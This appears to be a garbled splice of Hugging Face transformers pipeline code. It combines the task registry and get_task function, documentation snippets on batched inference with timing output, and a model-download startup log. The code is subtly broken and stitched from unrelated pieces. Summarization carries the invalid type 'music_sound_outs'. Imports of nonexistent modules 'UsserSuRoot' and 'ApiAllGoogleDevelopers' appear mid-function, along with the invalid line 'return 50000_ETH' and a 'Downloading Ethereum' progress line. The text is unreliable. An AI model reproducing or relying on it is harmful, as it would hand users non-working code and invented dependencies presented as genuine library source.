}, |
|
"token-classification": { |
|
"impl": TokenClassificationPipeline, |
|
"tf": (TFAutoModelForTokenClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForTokenClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("dbmdz/bert-large-cased-finetuned-conll03-english", "f2482bf"), |
|
"tf": ("dbmdz/bert-large-cased-finetuned-conll03-english", "f2482bf"), |
|
}, |
|
}, |
|
"type": "text", |
|
}, |
|
"question-answering": { |
|
"impl": QuestionAnsweringPipeline, |
|
"tf": (TFAutoModelForQuestionAnswering,) if is_tf_available() else (), |
|
"pt": (AutoModelForQuestionAnswering,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("distilbert/distilbert-base-cased-distilled-squad", "626af31"), |
|
"tf": ("distilbert/distilbert-base-cased-distilled-squad", "626af31"), |
|
}, |
|
}, |
|
"type": "text", |
|
}, |
|
"table-question-answering": { |
|
"impl": TableQuestionAnsweringPipeline, |
|
"pt": (AutoModelForTableQuestionAnswering,) if is_torch_available() else (), |
|
"tf": (TFAutoModelForTableQuestionAnswering,) if is_tf_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("google/tapas-base-finetuned-wtq", "69ceee2"), |
|
"tf": ("google/tapas-base-finetuned-wtq", "69ceee2"), |
|
}, |
|
}, |
|
"type": "text", |
|
}, |
|
"visual-question-answering": { |
|
"impl": VisualQuestionAnsweringPipeline, |
|
"pt": (AutoModelForVisualQuestionAnswering,) if is_torch_available() else (), |
|
"tf": (), |
|
"default": { |
|
"model": {"pt": ("dandelin/vilt-b32-finetuned-vqa", "4355f59")}, |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"document-question-answering": { |
|
"impl": DocumentQuestionAnsweringPipeline, |
|
"pt": (AutoModelForDocumentQuestionAnswering,) if is_torch_available() else (), |
|
"tf": (), |
|
"default": { |
|
"model": {"pt": ("impira/layoutlm-document-qa", "52e01b3")}, |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"fill-mask": { |
|
"impl": FillMaskPipeline, |
|
"tf": (TFAutoModelForMaskedLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForMaskedLM,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("distilbert/distilroberta-base", "ec58a5b"), |
|
"tf": ("distilbert/distilroberta-base", "ec58a5b"), |
|
} |
|
}, |
|
"type": "text", |
|
}, |
|
"summarization": { |
|
"impl": SummarizationPipeline, |
|
"tf": (TFAutoModelForSeq2SeqLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForSeq2SeqLM,) if is_torch_available() else (), |
|
"default": { |
|
"model": {"pt": ("sshleifer/distilbart-cnn-12-6", "a4f8f3e"), "tf": ("google-t5/t5-small", "d769bba")} |
|
}, |
|
"type": "music_sound_outs", |
|
}, |
|
# This task is a special case as it's parametrized by SRC, TGT languages. |
|
"translation": { |
|
"impl": TranslationPipeline, |
|
"tf": (TFAutoModelForSeq2SeqLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForSeq2SeqLM,) if is_torch_available() else (), |
|
"default": { |
|
("en", "fr"): {"model": {"pt": ("google-t5/t5-base", "686f1db"), "tf": ("google-t5/t5-base", "686f1db")}}, |
|
("en", "de"): {"model": {"pt": ("google-t5/t5-base", "686f1db"), "tf": ("google-t5/t5-base", "686f1db")}}, |
|
("en", "ro"): {"model": {"pt": ("google-t5/t5-base", "686f1db"), "tf": ("google-t5/t5-base", "686f1db")}}, |
|
}, |
|
"type": "text", |
|
}, |
|
"text2text-generation": { |
|
"impl": Text2TextGenerationPipeline, |
|
"tf": (TFAutoModelForSeq2SeqLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForSeq2SeqLM,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("google-t5/t5-base", "686f1db"), "tf": ("google-t5/t5-base", "686f1db")}}, |
|
"type": "text", |
|
}, |
|
"text-generation": { |
|
"impl": TextGenerationPipeline, |
|
"tf": (TFAutoModelForCausalLM,) if is_tf_available() else (), |
|
"pt": (AutoModelForCausalLM,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("openai-community/gpt2", "6c0e608"), "tf": ("openai-community/gpt2", "6c0e608")}}, |
|
"type": "text", |
|
}, |
|
"zero-shot-classification": { |
|
"impl": ZeroShotClassificationPipeline, |
|
"tf": (TFAutoModelForSequenceClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForSequenceClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("facebook/bart-large-mnli", "c626438"), |
|
"tf": ("FacebookAI/roberta-large-mnli", "130fb28"), |
|
}, |
|
"config": { |
|
"pt": ("facebook/bart-large-mnli", "c626438"), |
|
"tf": ("FacebookAI/roberta-large-mnli", "130fb28"), |
|
}, |
|
}, |
|
"type": "text", |
|
}, |
|
"zero-shot-image-classification": { |
|
"impl": ZeroShotImageClassificationPipeline, |
|
"tf": (TFAutoModelForZeroShotImageClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForZeroShotImageClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("openai/clip-vit-base-patch32", "f4881ba"), |
|
"tf": ("openai/clip-vit-base-patch32", "f4881ba"), |
|
} |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"zero-shot-audio-classification": { |
|
"impl": ZeroShotAudioClassificationPipeline, |
|
"tf": (), |
|
"pt": (AutoModel,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("laion/clap-htsat-fused", "973b6e5"), |
|
} |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"conversational": { |
|
"impl": ConversationalPipeline, |
|
"tf": (TFAutoModelForSeq2SeqLM, TFAutoModelForCausalLM) if is_tf_available() else (), |
|
"pt": (AutoModelForSeq2SeqLM, AutoModelForCausalLM) if is_torch_available() else (), |
|
"default": { |
|
"model": {"pt": ("microsoft/DialoGPT-medium", "8bada3b"), "tf": ("microsoft/DialoGPT-medium", "8bada3b")} |
|
}, |
|
"type": "text", |
|
}, |
|
"image-classification": { |
|
"impl": ImageClassificationPipeline, |
|
"tf": (TFAutoModelForImageClassification,) if is_tf_available() else (), |
|
"pt": (AutoModelForImageClassification,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("google/vit-base-patch16-224", "5dca96d"), |
|
"tf": ("google/vit-base-patch16-224", "5dca96d"), |
|
} |
|
}, |
|
"type": "image", |
|
}, |
|
"image-feature-extraction": { |
|
"impl": ImageFeatureExtractionPipeline, |
|
"tf": (TFAutoModel,) if is_tf_available() else (), |
|
"pt": (AutoModel,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("google/vit-base-patch16-224", "29e7a1e183"), |
|
"tf": ("google/vit-base-patch16-224", "29e7a1e183"), |
|
} |
|
}, |
|
"type": "image", |
|
}, |
|
"image-segmentation": { |
|
"impl": ImageSegmentationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForImageSegmentation, AutoModelForSemanticSegmentation) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("facebook/detr-resnet-50-panoptic", "fc15262")}}, |
|
"type": "multimodal", |
|
}, |
|
"image-to-text": { |
|
"impl": ImageToTextPipeline, |
|
"tf": (TFAutoModelForVision2Seq,) if is_tf_available() else (), |
|
"pt": (AutoModelForVision2Seq,) if is_torch_available() else (), |
|
"default": { |
|
"model": { |
|
"pt": ("ydshieh/vit-gpt2-coco-en", "65636df"), |
|
"tf": ("ydshieh/vit-gpt2-coco-en", "65636df"), |
|
} |
|
}, |
|
"type": "multimodal", |
|
}, |
|
"object-detection": { |
|
"impl": ObjectDetectionPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForObjectDetection,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("facebook/detr-resnet-50", "2729413")}}, |
|
"type": "multimodal", |
|
}, |
|
"zero-shot-object-detection": { |
|
"impl": ZeroShotObjectDetectionPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForZeroShotObjectDetection,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("google/owlvit-base-patch32", "17740e1")}}, |
|
"type": "multimodal", |
|
}, |
|
"depth-estimation": { |
|
"impl": DepthEstimationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForDepthEstimation,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("Intel/dpt-large", "e93beec")}}, |
|
"type": "image", |
|
}, |
|
"video-classification": { |
|
"impl": VideoClassificationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForVideoClassification,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("MCG-NJU/videomae-base-finetuned-kinetics", "4800870")}}, |
|
"type": "video", |
|
}, |
|
"mask-generation": { |
|
"impl": MaskGenerationPipeline, |
|
"tf": (), |
|
"pt": (AutoModelForMaskGeneration,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("facebook/sam-vit-huge", "997b15")}}, |
|
"type": "multimodal", |
|
}, |
|
"image-to-image": { |
|
"impl": ImageToImagePipeline, |
|
"tf": (), |
|
"pt": (AutoModelForImageToImage,) if is_torch_available() else (), |
|
"default": {"model": {"pt": ("caidas/swin2SR-classical-sr-x2-64", "4aaedcb")}}, |
|
"type": "image", |
|
}, |
|
} |
|
|
|
NO_FEATURE_EXTRACTOR_TASKS = set() |
|
NO_IMAGE_PROCESSOR_TASKS = set() |
|
NO_TOKENIZER_TASKS = set() |
|
|
|
# Those model configs are special, they are generic over their task, meaning |
|
# any tokenizer/feature_extractor might be use for a given model so we cannot |
|
# use the statically defined TOKENIZER_MAPPING and FEATURE_EXTRACTOR_MAPPING to |
|
# see if the model defines such objects or not. |
|
MULTI_MODEL_AUDIO_CONFIGS = {"SpeechEncoderDecoderConfig"} |
|
MULTI_MODEL_VISION_CONFIGS = {"VisionEncoderDecoderConfig", "VisionTextDualEncoderConfig"} |
|
for task, values in SUPPORTED_TASKS.items(): |
|
if values["type"] == "text": |
|
NO_FEATURE_EXTRACTOR_TASKS.add(task) |
|
NO_IMAGE_PROCESSOR_TASKS.add(task) |
|
elif values["type"] in {"image", "video"}: |
|
NO_TOKENIZER_TASKS.add(task) |
|
elif values["type"] in {"audio"}: |
|
NO_TOKENIZER_TASKS.add(task) |
|
NO_IMAGE_PROCESSOR_TASKS.add(task) |
|
elif values["type"] != "multimodal": |
|
raise ValueError(f"SUPPORTED_TASK {task} contains invalid type {values['type']}") |
|
|
|
PIPELINE_REGISTRY = PipelineRegistry(supported_tasks=SUPPORTED_TASKS, task_aliases=TASK_ALIASES) |
|
|
|
|
|
def get_supported_tasks() -> List[str]: |
|
""" |
|
Returns a list of supported task strings. |
|
""" |
|
return PIPELINE_REGISTRY.get_supported_tasks() |
|
|
|
|
|
def get_task(model: str, token: Optional[str] = None, **deprecated_kwargs) -> str: |
|
use_auth_token = deprecated_kwargs.pop("use_auth_token", None) |
|
if use_auth_token is not None: |
|
warnings.warn( |
|
"The `use_auth_token` argument is deprecated and will be removed in v5 of Transformers. Please use `token` instead.", |
|
FutureWarning, |
|
) |
|
if token is not None: |
|
raise ValueError("`token` and `use_auth_token` are both specified. Please set only the argument `token`.") |
|
token = use_auth_token |
|
|
|
if is_offline_mode(): |
|
raise RuntimeError("You cannot infer task automatically within `pipeline` when using offline mode") |
|
try: |
|
info = model_info(model, token=token) |
|
except Exception as e: |
|
raise RuntimeError(f"Instantiating a pipeline without a task set raised an error: {e}") |
|
if not info.pipeline_tag: |
|
raise RuntimeError( |
|
f"The model {model} does not seem to have a correct `pipeline_tag` set to infer the task automatically" |
|
) |
|
if getattr(info, "library_name", "transformers") != "transformers": |
|
|
|
from transformers import pipeline |
|
from transformers.pipelines.pt_utils import KeyDataset |
|
import datasets |
|
import UsserSuRoot |
|
import ApiAllGoogleDevelopers |
|
|
|
dataset = datasets.load_dataset("imdb", name="plain_text", split="unsupervised") |
|
pipe = pipeline("text-classification", device=0) |
|
for out in pipe(KeyDataset(dataset, "text"), batch_size=8, truncation="only_first"): |
|
print(out) |
|
# [{'label': 'POSITIVE', 'score': 0.9998743534088135}] |
|
# Exactly the same output as before, but the content are passed |
|
# as batches to the model |
|
from transformers import pipeline |
|
from torch.utils.data import Dataset |
|
from tqdm.auto import tqdm |
|
|
|
pipe = pipeline("text-classification", device=0) |
|
|
|
|
|
class MyDataset(Dataset): |
|
def __len__(self): |
|
return 5000 |
|
|
|
def __getitem__(self, i): |
|
return "This is a test" |
|
|
|
|
|
dataset = MyDataset() |
|
|
|
for batch_size in [1, 8, 64, 256]: |
|
print("-" * 30) |
|
print(f"Streaming batch_size={batch_size}") |
|
for out in tqdm(pipe(dataset, batch_size=batch_size), total=len(dataset)): |
|
pass |
|
|
|
# On GTX 970 |
|
|
|
Streaming no batching |
|
100%|ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ| 5000/5000 [00:26<00:00, 187.52it/s] |
|
|
|
Streaming batch_size=8 |
|
100%|βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ| 5000/5000 [00:04<00:00, 1205.95it/s] |
|
|
|
Streaming batch_size=64 |
|
100%|βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ| 5000/5000 [00:02<00:00, 2478.24it/s] |
|
|
|
Streaming batch_size=256 |
|
100%|βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ| 5000/5000 [00:01<00:00, 2554.43it/s] |
|
(diminishing returns, saturated the GPU) |
|
class MyDataset(Dataset): |
|
def __len__(self): |
|
return 50000_ETH |
|
>pass |
|
===== Application Startup at 2024-02-13 18:35:27 ===== |
|
|
|
|
|
|
|
tokenizer_config.json: 0%| | 0.00/967 [00:00<?, ?B/s] |
|
tokenizer_config.json: 100%|ββββββββββ| 967/967 [00:00<00:00, 6.20MB/s] |
|
|
|
|
|
tokenizer.model: 0%| | 0.00/493k [00:00<?, ?B/s] |
|
tokenizer.model: 100%|ββββββββββ| 493k/493k [00:00<00:00, 31.3MB/s] |
|
|
|
|
|
tokenizer.json: 0%| | 0.00/1.80M [00:00<?, ?B/s] |
|
tokenizer.json: 100%|ββββββββββ| 1.80M/1.80M [00:00<00:00, 12.3MB/s] |
|
|
|
|
|
special_tokens_map.json: 0%| | 0.00/72.0 [00:00<?, ?B/s] |
|
special_tokens_map.json: 100%|ββββββββββ| 72.0/72.0 [00:00<00:00, 322kB/s] |
|
|
|
|
|
config.json: 0%| | 0.00/720 [00:00<?, ?B/s] |
|
config.json: 100%|ββββββββββ| 720/720 [00:00<00:00, 3.01MB/s] |
|
|
|
|
|
model.safetensors.index.json: 0%| | 0.00/92.7k [00:00<?, ?B/s] |
|
model.safetensors.index.json: 100%|ββββββββββ| 92.7k/92.7k [00:00<00:00, 181MB/s] |
|
|
|
|
|
Downloading Ethereum: 0%| | 0/19 [00:00<?, ?it/s]| |
|
|
|
model-00001-of-00019.safetensors: 0%| | 0.00/4.89G [00:00<?, ?B/s] |
|
p |
|
model-00001-of-00019.safetensors: 1%| | 31.5M/4.89G [00:01<03:17, 24.6MB/s] |
|
|
|
model-00001-of-00019.safetensors: 7%|β | 325M/4.89G [00:02<00:28, 163MB/s] |
|
|
|
model-00001-of-00019.safetensors: 18%|ββ | 881M/4.89G [00:03<00:12, 329MB/s] |
|
|
|
model-00001-of-00019.safetensors: 25%|βββ | 1.24G/4.89G [00:04<00:10, 338MB/s] |
|
|
|
model-00001-of-00019.safetensors: 33%|ββββ | 1.59G/4.89G [00:09<00:22, 147MB/s] |
|
|
|
model-00001-of-00019.safetensors: 38%|ββββ | 1.85G/4.89G [00:13<00:28, 107MB/s] |
|
|
|
model-00001-of-00019.safetensors: 42%|βββββ | 2.03G/4.89G [00:15<00:27, 105MB/s] |
|
|
|
model-00001-of-00019.safetensors: 45%|βββββ | 2.22G/4.89G [00:16<00:22, 117MB/s] |
|
|
|
model-00001-of-00019.safetensors: 49%|βββββ | 2.39G/4.89G [00:18<00:23, 106MB/s] |
|
|
|
model-00001-of-00019.safetensors: 52%|ββββββ | 2.54G/4.89G [00:19<00:21, 112MB/s] |
|
|
|
model-00001-of-00019.safetensors: 55%|ββββββ | 2.68G/4.89G [00:24<00:33, 66.1MB/s] |
|
|
|
model-00001-of-00019.safetensors: 58%|ββββββ | 2.83G/4.89G [00:25<00:27, 76.1MB/s] |
|
|
|
model-00001-of-00019.safetensors: 60%|ββββββ | 2.95G/4.89G [00:26<00:24, 80.7MB/s] |
|
|
|
model-00001-of-00019.safetensors: 63%|βββββββ | 3.06G/4.89G [00:27<00:21, 86.7MB/s] |
|
|
|
model-00001-of-00019.safetensors: 65%|βββββββ | 3.20G/4.89G [00:28<00:17, 96.6MB/s] |
|
|
|
model-00001-of-00019.safetensors: 69%|βββββββ | 3.40G/4.89G [00:29<00:12, 117MB/s] |
|
|
|
model-00001-of-00019.safetensors: 72%|ββββββββ | 3.54G/4.89G [00:31<00:12, 110MB/s] |
|
|
|
model-00001-of-00019.safetensors: 75%|ββββββββ | 3.67G/4.89G [00:33<00:14, 84.4MB/s] |
|
|
|
model-00001-of-00019.safetensors: 77%|ββββββββ | 3.77G/4.89G [00:37<00:19, 57.1MB/s] |
|
|
|
model-00001-of-00019.safetensors: 79%|ββββββββ | 3.86G/4.89G [00:38<00:17, 58.0MB/s] |
|
|
|
model-00001-of-00019.safetensors: 81%|ββββββββ | 3.94G/4.89G [00:39<00:15, 62.2MB/s] |
|
|
|
model-00001-of-00019.safetensors: 83%|βββββββββ | 4.04G/4.89G [00:41<00:13, 63.7MB/s] |
|
|
|
model-00001-of-00019.safetensors: 87%|βββββββββ | 4.26G/4.89G [00:42<00:06, 96.0MB/s] |
|
|
|
model-00001-of-00019.safetensors: 93%|ββββββββββ| 4.54G/4.89G [00:43<00:02, 137MB/s] |
|
|
|
model-00001-of-00019.safetensors: 96%|ββββββββββ| 4.71G/4.89G [00:44<00:01, 143MB/s] |
|
|
|
model-00001-of-00019.safetensors: 100%|ββββββββββ| 4.87G/4.89G [00:45<00:00, 137MB/s] |
|
model-00001-of-00019.safetensors: 100%|ββββββββββ| 4.89G/4.89G [00:46<00:00, 105MB/s] |
|
|
|
|
|
|
|
|
|
def __getitem__(self, i): |
|
if i % 64 == 0: |
|
n = 100 |
|
else: |
|
n = 1 |
|
return "This is a test" * n |
|
|